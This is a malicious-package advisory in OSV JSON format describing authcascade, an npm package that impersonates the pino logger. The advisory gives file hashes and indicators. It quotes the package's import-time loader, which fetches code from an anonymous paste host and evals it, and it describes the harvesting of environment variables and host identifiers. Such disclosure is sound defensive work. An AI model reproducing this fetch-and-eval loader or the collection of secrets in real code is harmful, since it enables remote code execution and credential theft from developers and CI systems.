{"id":"MAL-2026-4491","summary":"Malicious code in authcascade (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (8fece3d89e066c6c3452fda608e77747b7d4fa4cbbf6498fd41e5a5a765d57d9)\nOn require('authcascade'), the package's main entry pino.js loads lib/writer.js which (a) builds a data object containing the full process.env, OS platform, hostname, username, and all non-internal MAC addresses, and (b) fetches a base64-decoded URL (https://www.jsonkeeper.com/b/PJNZP) via axios.get and passes the response body directly to eval(): `require('axios').get(atob(...)).then(r =\u003e { eval(r.data.data); })`. A second hex-obfuscated jsonkeeper.com URL (/b/HY6M6) is staged in the same module. jsonkeeper.com is an anonymous, mutable JSON paste host — the maintainer can swap in arbitrary JavaScript at any moment, which then executes in the same scope as the harvested host fingerprint and environment variables (CI secrets, AWS/GitHub/npm tokens, etc.), giving attacker-controlled remote code execution and credential theft on every installer that loads the package. The package additionally impersonates the legitimate `pino` logger: package.json sets `main: pino.js`, `homepage: https://getpino.io`, and the lib/ tree mirrors pino's source layout (proto.js, levels.js, redaction.js, multistream.js, transport.js, worker.js, tools.js). The combination of identity spoofing, import-time fetch-and-eval from a mutable anonymous host, and bulk environment/host-identifier collection is an unambiguous supply-chain attack.\n","modified":"2026-05-26T06:02:14.647710287Z","published":"2026-05-25T09:58:20Z","database_specific":{"malicious-packages-origins":[{"id":"IN-MAL-2026-004618","sha256":"8fece3d89e066c6c3452fda608e77747b7d4fa4cbbf6498fd41e5a5a765d57d9","modified_time":"2026-05-25T09:58:20Z","versions":["1.5.25"],"source":"amazon-inspector","import_time":"2026-05-26T05:52:57.536665701Z"},{"id":"IN-MAL-2026-004652","sha256":"da3c1c50bd72e5fb149916a0169ed0542bcf03457144189ac508629e2f1b12ff","modified_time":"2026-05-25T13:47:37Z","versions":["1.5.26"],"source":"amazon-inspector","import_time":"2026-05-26T05:53:01.474840428Z"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/authcascade/v/1.5.25"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/authcascade/v/1.5.26"}],"affected":[{"package":{"name":"authcascade","ecosystem":"npm","purl":"pkg:npm/authcascade"},"versions":["1.5.25","1.5.26"],"database_specific":{"cwes":[{"description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code","cweId":"CWE-506"},{"description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code","cweId":"CWE-506"}],"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/authcascade/MAL-2026-4491.json","indicators":{"package_integrity":[{"hashes":{"sha1":"b536fcfd356da7ffb7287fb48729bf6213a2030d","sha512_sri":"sha512-oHytPHKqRqjECOvdWWae+9XECBFm53hjnmHRe6YuYSY/U8QNFk0f4oAAY4gmeybiRJ4dH052R6Fe3zjmCGo1Rw=="},"filename":"authcascade-1.5.25.tgz"}],"evidence_files":[{"sha256":"4ef10bd495900ba99f11ec69a5420d51fb2e5caa6a11d3656756df150a13524e","tlsh":"4f2111a1d3966810223007b248db4460bae5f3612093419cb9bcd6c92ff38e2b154fe8","path":"lib/writer.js"},{"sha256":"a01d6ff7073cedb09d8455b476349e938bd9e748da112b5db3b688bfc388692c","tlsh":"46016665c9784e6306d915d24c2a0283aae1ad0b6908fd1d33d7931c1f8e4bf16bb26e","path":"package.json"}]}}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["actran@amazon.com"],"type":"FINDER"}]}